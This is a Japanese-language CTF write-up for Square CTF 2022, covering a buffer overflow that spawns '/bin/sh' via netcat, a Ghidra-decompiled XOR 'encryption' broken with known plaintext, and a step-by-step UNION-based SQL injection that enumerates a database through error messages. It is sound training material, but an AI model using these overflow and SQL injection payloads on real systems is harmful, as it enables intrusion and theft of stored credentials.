この大会は2022/11/19 10:00(JST)~2022/11/20 10:10(JST)に開催されました。
今回もチームで参戦。結果は201点で593チーム中182位でした。
自分で解けた問題をWriteupとして書いておきます。
Pulse Check (pulse-check 1)
問題にフラグが書いてあった。
flag{im_alive_and_so_are_the_servers}
EZ pwn 1 (ez-pwn 50)
BOFで任意の8バイトの後に"/bin/sh"を入力すればよい。入力の9バイト目以降が、実行されるコマンド文字列(本来はls)を上書きしていると考えられる。
$ nc chals.2022.squarectf.com 4100
Hi! would you like me to ls the current directory?
AAAAAAAA/bin/sh
Ok, here ya go!
ls -l
total 16
-r-xr-x--- 1 root pwnable_user 8528 Nov 6 21:09 ez-pwn-1
drwxr-xr-x 1 root pwnable_user 4096 Nov 9 04:49 the_flag_is_in_here
ls -l the_flag_is_in_here
total 4
-r--r----- 1 root pwnable_user 64 Nov 6 21:09 flag.txt
cat the_flag_is_in_here/flag.txt
flag{congrats_youve_exploited_a_memory_corruption_vulnerability}
flag{congrats_youve_exploited_a_memory_corruption_vulnerability}
EZ RE 1 (ez-re 100)
Ghidraでデコンパイルする。
/* Ghidra decompiler output for the challenge binary. The comments are review
   annotations; the code is exactly as the decompiler emitted it. */

/*
 * main: prompts for a key, reads 5 bytes from stdin, XORs them over flag_arr
 * and prints the result when the first five output bytes equal "flag{".
 */
undefined8 main(void)

{
  int iVar1;
  char *__s2;
  long in_FS_OFFSET;
  undefined local_15 [5];
  long local_10;
  
  /* Stack-protector canary: saved here and re-checked before returning. */
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts(
      "I\'ve got this encrypted blob, and a mysterious encrypt/decrypt function I was told its milit ary grade encryption so I don\'t think I can crack it. Would you happen to know the key?:"
      );
  /* Reads at most 5 bytes into the 5-byte buffer, so this read cannot overflow it.
     The return value is ignored; a short read leaves the tail of the key uninitialized. */
  read(0,local_15,5);
  puts("Alright, lets try that out...");
  /* Arguments: key, ciphertext, key length 5, ciphertext length 0x3f (63 bytes). */
  __s2 = (char *)militaree_grayd_deekrypshun(local_15,flag_arr,5,0x3f);
  /* The only validation is this 5-byte prefix compare. The key is also 5 bytes,
     so the known prefix "flag{" XOR the first 5 ciphertext bytes gives the whole key. */
  iVar1 = strncmp("flag{",__s2,5);
  if (iVar1 == 0) {
    puts("Hey, that looks right!");
    /* NOTE(review): the buffer is malloc(0x3f) and all 63 bytes are filled with no
       terminator written in the code shown, so puts() depends on a zero byte
       happening to follow the allocation. */
    puts(__s2);
    puts(
        "There was also this weird other encrypted blob, but its so big that I don\'t want to touch it. Feel free to decrypt it yourself though, i\'m pretty sure it uses the same key and algor ithm!\n"
        );
  }
  else {
    puts("No, that doesn\'t look right.");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

/*
 * militaree_grayd_deekrypshun: forwards all four arguments unchanged to
 * militaree_grayd_enkrypshun, so decryption and encryption are the same XOR.
 * NOTE(review): Ghidra types this as void although main uses its result as a
 * pointer; presumably a decompiler typing artifact.
 */
void militaree_grayd_deekrypshun
               (undefined8 param_1,undefined8 param_2,undefined4 param_3,undefined4 param_4)

{
  militaree_grayd_enkrypshun(param_1,param_2,param_3,param_4);
  return;
}

/*
 * militaree_grayd_enkrypshun: repeating-key XOR.
 *   param_1 - key bytes (indexed 0 .. param_3-1)
 *   param_2 - input bytes (indexed 0 .. param_4-1)
 *   param_3 - key length
 *   param_4 - input length
 * Returns a newly malloc'ed buffer of param_4 bytes holding the XOR result.
 */
void * militaree_grayd_enkrypshun(long param_1,long param_2,int param_3,int param_4)

{
  void *pvVar1;
  int local_18;
  int local_14;
  
  /* The malloc result is not checked before it is written through. */
  pvVar1 = malloc((long)param_4);
  /* Outer loop: start offset of each key-length chunk. */
  for (local_18 = 0; local_18 < param_4; local_18 = local_18 + param_3) {
    /* Inner loop: position within the key; stops early on the final partial chunk. */
    for (local_14 = 0; (local_14 < param_3 && (param_4 != local_14 + local_18));
        local_14 = local_14 + 1) {
      /* out[chunk + j] = key[j] ^ in[chunk + j]; the key restarts every param_3 bytes. */
      *(byte *)((long)pvVar1 + (long)(local_14 + local_18)) =
           *(byte *)(param_1 + local_14) ^ *(byte *)(param_2 + (local_14 + local_18));
    }
  }
  /* Exactly param_4 bytes were written; no NUL terminator is appended. */
  return pvVar1;
}

/* Ghidra data listing for flag_arr (address, byte value, type, index); the
   listing continues on the next line of the page. */
flag_arr XREF[2]: Entry Point(*), main:001008b1(*) 00301020 0a 03 0d undefine 1f 1f 18 07 09 27 00301020 0a undefined10Ah [0] XREF[2]: Entry Point(*), main:001008b1(*) 00301021 03 undefined103h [1] 00301022 0d undefined10Dh [2] 00301023 1f undefined11Fh [3] 00301024 1f undefined11Fh [4] 00301025 18 undefined118h [5] 00301026 07 undefined107h [6] 00301027 09 undefined109h [7] 
00301028 27 undefined127h [8] 00301029 02 undefined102h [9] 0030102a 19 undefined119h [10] 0030102b 01 undefined101h [11] 0030102c 0f undefined10Fh [12] 0030102d 0c undefined10Ch [13] 0030102e 0d undefined10Dh [14] 0030102f 03 undefined103h [15] 00301030 01 undefined101h [16] 00301031 33 undefined133h [17] 00301032 16 undefined116h [18] 00301033 05 undefined105h [19] 00301034 01 undefined101h [20] 00301035 0a undefined10Ah [21] 00301036 1f undefined11Fh [22] 00301037 27 undefined127h [23] 00301038 05 undefined105h [24] 00301039 1e undefined11Eh [25] 0030103a 0a undefined10Ah [26] 0030103b 33 undefined133h [27] 0030103c 19 undefined119h [28] 0030103d 3b undefined13Bh [29] 0030103e 0f undefined10Fh [30] 0030103f 00 undefined100h [31] 00301040 01 undefined101h [32] 00301041 15 undefined115h [33] 00301042 11 undefined111h [34] 00301043 18 undefined118h [35] 00301044 0e undefined10Eh [36] 00301045 18 undefined118h [37] 00301046 11 undefined111h [38] 00301047 12 undefined112h [39] 00301048 09 undefined109h [40] 00301049 30 undefined130h [41] 0030104a 1c undefined11Ch [42] 0030104b 0a undefined10Ah [43] 0030104c 0b undefined10Bh [44] 0030104d 1c undefined11Ch [45] 0030104e 0a undefined10Ah [46] 0030104f 1e undefined11Eh [47] 00301050 0c undefined10Ch [48] 00301051 1d undefined11Dh [49] 00301052 33 undefined133h [50] 00301053 05 undefined105h [51] 00301054 03 undefined103h [52] 00301055 13 undefined113h [53] 00301056 01 undefined101h [54] 00301057 33 undefined133h [55] 00301058 08 undefined108h [56] 00301059 09 undefined109h [57] 0030105a 0c undefined10Ch [58] 0030105b 3b undefined13Bh [59] 0030105c 05 undefined105h [60] 0030105d 1b undefined11Bh [61] 0030105e 11 undefined111h [62] 0030105f 00 ?? 00h
入力文字列とflag_arrのXORをした結果の最初の5文字が"flag{"になる入力文字列を指定すればよい。鍵は5バイトで繰り返し使われるため、既知の先頭5文字"flag{"とflag_arrの先頭5バイトをXORすれば鍵全体が求まる。
#!/usr/bin/env python3
# Recover the 5-byte XOR key from known plaintext.
# The binary XORs the key over flag_arr and accepts it when the output starts
# with "flag{", so key[i] = plaintext[i] ^ ciphertext[i] for the first 5 bytes.

# First five bytes of flag_arr, taken from the Ghidra listing.
flag_arr = [0x0a, 0x03, 0x0d, 0x1f, 0x1f]
# Known plaintext prefix that the binary checks for.
flag = b'flag{'

# XOR each known plaintext byte with its ciphertext byte to get the key character.
inp = ''.join(chr(plain ^ cipher) for plain, cipher in zip(flag, flag_arr))
print(inp)
実行結果は以下の通り。
lolxd
$ ./ez-re-1_elf
I've got this encrypted blob, and a mysterious encrypt/decrypt function I was told its military grade encryption so I don't think I can crack it. Would you happen to know the key?:
lolxd
Alright, lets try that out...
Hey, that looks right!
flag{the_function_names_are_a_commutative_property_joke_get_it}
There was also this weird other encrypted blob, but its so big that I don't want to touch it. Feel free to decrypt it yourself though, i'm pretty sure it uses the same key and algorithm!
flag{the_function_names_are_a_commutative_property_joke_get_it}
Alex Hanlon Has The Flag! (web 50)
SQLインジェクションを試す。いろいろとUsernameに入力していき、反応を見る。エラーメッセージに問い合わせ結果の値がそのまま表示されるため、UNION SELECTの結果を1件ずつ読み取れる。
・' or 1=1 # →Sorry, admin is the wrong user
・' union select 'alex' # →Sorry, alex is the wrong user
・' union select 'hanlon' # →Sorry, hanlon is the wrong user
・' union select schema_name from information_schema.schemata limit 0, 1 # →Sorry, information_schema is the wrong user
・' union select schema_name from information_schema.schemata limit 1, 1 # →Sorry, performance_schema is the wrong user
・' union select schema_name from information_schema.schemata limit 2, 1 # →Sorry, appdb is the wrong user
・' union select table_name from information_schema.tables where table_schema = 'appdb' limit 0, 1 # →Sorry, user is the wrong user
・' union select column_name from information_schema.columns where table_name = 'user' limit 0, 1 # →Sorry, password is the wrong user
・' union select column_name from information_schema.columns where table_name = 'user' limit 1, 1 # →Sorry, username is the wrong user
・' union select username from user limit 0, 1 # →Sorry, admin is the wrong user
・' union select username from user limit 1, 1 # →flag{470bbbc0519e4bc6987bb00bef24a97a}
flag{470bbbc0519e4bc6987bb00bef24a97a}